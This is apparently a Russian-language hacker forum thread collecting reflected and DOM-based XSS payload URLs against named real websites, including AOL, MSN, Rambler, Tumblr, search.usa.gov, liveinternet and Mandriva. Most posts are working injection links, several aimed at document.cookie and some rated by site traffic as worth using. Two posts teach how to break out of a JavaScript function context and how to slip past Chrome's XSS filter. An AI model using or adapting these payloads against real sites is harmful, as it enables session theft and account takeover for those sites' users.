Code: http://autos.[B][COLOR=Green]aol.com[/COLOR][/B]/cars-Buick-Enclave-2012-foo__bla-xss-6619"><script>alert%2528document.cookie%2529</script><noscript>/best-deal/
Крупнейший русскоязычный битторрент трекер. Code: http://pm.[COLOR=Red]rutracker.org[/COLOR]/forum/privmsg.php?mode=post"><script>alert(document.cookie)</script>
Рамблер. Code: http://horoscopes.[COLOR=Red]rambler.ru[/COLOR]/names.html?rubric=0&words=test"><script>alert('xss')</script> Code: http://help.[COLOR=Red]rambler.ru[/COLOR]/1/search/avia/?set=help&query=111"><script>alert('xss')</script> Code: http://planeta.[COLOR=Red]rambler.ru[/COLOR]/abuse.html?url="><script>alert('xss')</script>
Было бы интересно почитать, как это сделать. JS выполняется даже не на поддомене, а на googleusercontent.com. Кроме опен-редиректа и фишинга юзеров гугла не могу придумать варианты использования этого бага.
Tumblr - сервис микроблоггингатИЦ 3600 PR 8 HTML: https://www.tumblr.com/register/join_tumblr?referring_blog=usagov%22%3E%3Cscript%3Ealert()%3C/script%3E P.S. Достаточно известный сервис, можно юзнуть -- USA Government тИЦ 350 PR 10 Code: http://search.usa.gov/search/news?affiliate=usa.govblog&locale=en&m=false&query=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&tbs=h P.S. Тут есть ПП, поэтому может кому понадобится.
Ещё один msn.com http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992"/></a></><img src=1.gif onerror=alert(1)>
Это не обычная пассивка, а DOM-based, поэтому защита от XSS в браузерах на нее не сработает. Со страницы вызывается скрипт http://www.ringtonio.nl/javagames/?..., уязвимый к XSS в реферере. Данные из реферера выводятся в двух местах: Видно, что кавычки экранируются. Но это происходит внутри строки в функции вывода, поэтому на странице экранирования не будет. В примере используется второй вариант вывода - внутри тега input. Но зачем лишние символы? http://ringtones.nl.msn.com/games.php?rtch=1&rtlo=41992"></a></><img src=1.gif onerror=alert(1)> Без них все работает нормально: http://ringtones.nl.msn.com/games.php?rtlo="><img src=1 onerror="alert(1) Так как данные на страницу выводятся в двух местах, есть еще один вариант атаки. JS-код внедряется в функцию: PHP: function sendjava(nr) { window.open(bd + "/send/javagame?id=" + nr + "&clx=1&rths=0&brpc=&rtlo=[XSS]", "sendpop", "toolbar=no, location=no, directories=no, status=yes, menubar=no, scrollbars=yes, resizable=no, copyhistory=no, width=600, height=450, screenX=0, screenY=0, top=0, left=0"); } Чтобы код XSS выполнился, надо сделать так, чтобы синтаксис не нарушился. Для этого закрываем: 1) строку "&clx=1&rths=0&brpc=&rtlo= 2) вызов функции window.open( 3) определение функции sendjava(nr){ Результат - ")} 4) добавляем исполняемый код Результат - ")}alert(1); 5) все, что было закрыто в пунктах 1-3, должно быть открыто в обратном порядке: 5.1) определение функции - function a(){ 5.2) вызов функции - b( 5.3) строка - " Результат - ")}alert(1);function a(){b(" http://ringtones.nl.msn.com/games.php?rtlo=")}alert(1);function a(){b("
liveinternet.ru Code: http://www.liveinternet.ru/tests.php?cmd=show&session_id=7f00c824a22d703516ea5e7e94fc4a1b&order=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E Code: http://www.liveinternet.ru/search/?q="><script>alert(document.cookie)</script>
Code: http://muziek.downloaden.nl.[COLOR=Cyan]msn.com[/COLOR]/artist.php?artist=2pac"><script>alert(document.cookie)</script><!-- Code: http://store.[COLOR=Cyan]mandriva.com[/COLOR]/simple_popup_image.php?img=%27%3E%3Cscript%3Ealert%28%29%3C/script%3E%3Ca P.S. Xss с mandriva пашет только в Opera+IE.
Продолжаем знакомство с XSS. Тема урока - "почему в одном браузере работает, а в другом нет" http://store.mandriva.com/simple_popup_image.php?img='><script>alert()</script><a Firefox не поддерживает функцию alert() без аргументов. Рабочий вариант: http://store.mandriva.com/simple_popup_image.php?img='><script>alert(1)</script><a Фильтр Chrome не пропускает большинство пассивных XSS (IE >= 8 тоже). "alert()" вырезается фильтром и XSS не срабатывает. Чтобы это увидеть, можно в окне браузера нажать правую кнопку мыши и выбрать "Inspect element" На странице код внедряется внутри тега img. У этого тега есть события onload и onerror, поэтому нет смысла его закрывать и использовать тег script. Достаточно вставить такой код: http://store.mandriva.com/simple_popup_image.php?img='+onerror=alert(1)+ Этот вариант работает в IE (до 8 версии), опере, фф, но все так же не работает в хроме. Фильтр вырезает "=alert(1)". Попробуем сделать так: http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/ Код "alert(1);/" содержит ошибку синтаксиса JS и не будет выполняться браузером, поэтому фильтровать его (казалось бы) необязательно. Но посмотрим внимательнее на ответ сервера: Так как после onerror= нет открывающей кавычки, весь код до закрытия тега будет считаться значением onerror. Браузер этот код видит так: "alert(1);/'/" уже не содержит ошибок синтаксиса и выполняется хромом в обход фильтра. Окончательный вариант: http://store.mandriva.com/simple_popup_image.php?img='onerror=alert(1);/ Не работает в IE >= 8
http://techguru.aol.com/?ncid=txtlnkusstor00000094"><script>alert(String.fromCharCode(88,83,83,32,65,78,84,73,67,72,65,84))</script>
Lycos Mail тИЦ 100 PR 7 Code: http://games.lycos.com/board-game/gacopyrze-vs_-wilkolki<script>alert(document.cookie)</script>/
